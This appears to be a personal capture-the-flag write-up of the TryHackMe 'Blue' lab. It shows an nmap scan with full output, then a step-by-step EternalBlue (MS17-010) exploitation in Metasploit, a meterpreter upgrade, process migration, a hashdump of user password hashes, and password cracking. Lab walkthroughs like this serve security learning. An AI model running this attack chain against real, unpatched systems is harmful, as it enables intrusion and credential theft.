Blue explores the dated, but widespread EternalBlue exploit. This exploit was used in the WannaCry ransomware attack which crippled healthcare systems and spread to millions of computers in a matter of days. In this room we are prompted to exploit this vulnerability using Metasploit.
First things first. Let’s conduct a scan on the box using the command
nmap -sS -sV -A $IP.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 00:27 EDT Nmap scan report for 10.10.203.178 Host is up (0.14s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? |_ssl-date: 2020-05-24T04:28:55+00:00; -1s from scanner time. 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h14m59s, deviation: 2h30m00s, median: 0s |_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:fd:24:c1:40:16 (unknown) | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: Jon-PC | NetBIOS computer name: JON-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-05-23T23:28:50-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-24T04:28:50 |_ start_date: 2020-05-24T04:27:10 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 157.79 seconds
Looking at the results the machine is running Windows 7 Professional 7601. If we google this version number we can find out that this version might be vulnerable to the “EternalBlue” (MS17-010) vulnerability. You can read more about it here. Now that we are done with recon, we can begin to try and gain access.
To gain access we are going to be using
metasploit. To start
metasploit use the command
msfconsole. Then let’s ping the server just to be sure that we can connect.
ping $IP. In the
metasploit console we can use the command
search MS17-010 to see exploits we can use. Next we can see payload 3 that has the title
exploit/windows/smb/ms17_010_eternalblue. This is the code will will use to run against the machine. Now that these payloads are found we can use the command
use 3 to load the payload. Now that we have our payload set we can the options. Use the command
show options to see which options we need to set in order to use our attack. We can see that the only field that is required but not set is the
RHOSTS. To set this field we can use the command
set RHOSTS 10.10.100.140. Now when we do
show options again we should be able to see our target IP address. Now that all the options are set run the command
exploit to launch our payload.
Now that we have access to the machine that we want, we can upgrade our shell to a
meterpreter shell. The easy way to do this, given that we have already put the shell in the background using CTRL-Z. We can use the command
sessions to see the sessions. In my instance the session we are interested in has the ID 1. So I will use the command
sessions -u 1. But you can also use the module
post/multi/manage/shell_to_meterpreter, then use the command
use post/multi/manage/shell_to_meterpreter. Now that we are using the post exploit module we can set the SESSION option to the session ID. Use the command
set SESSION 1. Now that the session is set, let’s fire up the meterpreter. Now let’s
run. Once execution is complete press enter and select the new meterpreter session from our available sessions. Use the command
sessions 2. Now that we are in the meterpreter shell we can use the command
whoami to verify that we are the
nt authority\system user. Now let’s take a look at the processes using the command
ps. Write down a process id towards the bottom of the list to migrate to. This might be unstable and not work the first time. If it fails try again (this is what tryhackme says). I used the
LiteAgent.exe process and it worked. Now that we have migrated the process let’s get the user’s hashes. Use the command
hashdump and if the privileges were escalated correctly we should see all the users and their hashes. We can also see that there is a user named ‘Jon’. Now to crack his password. I used the website CrackStation. To crack the password. Turns out this user’s password is
The first flag can be found in the root directory in the file
flag1.txt. The third flag is in the user Jon’s documents. The second flag is found in the directory
C:/Windows/system32/config. This is also the directory where windows passwords are stored. Interesting stuff.
This was a fun box and I feel like I have a better understanding of navigating through Windows directories and using the metasploit.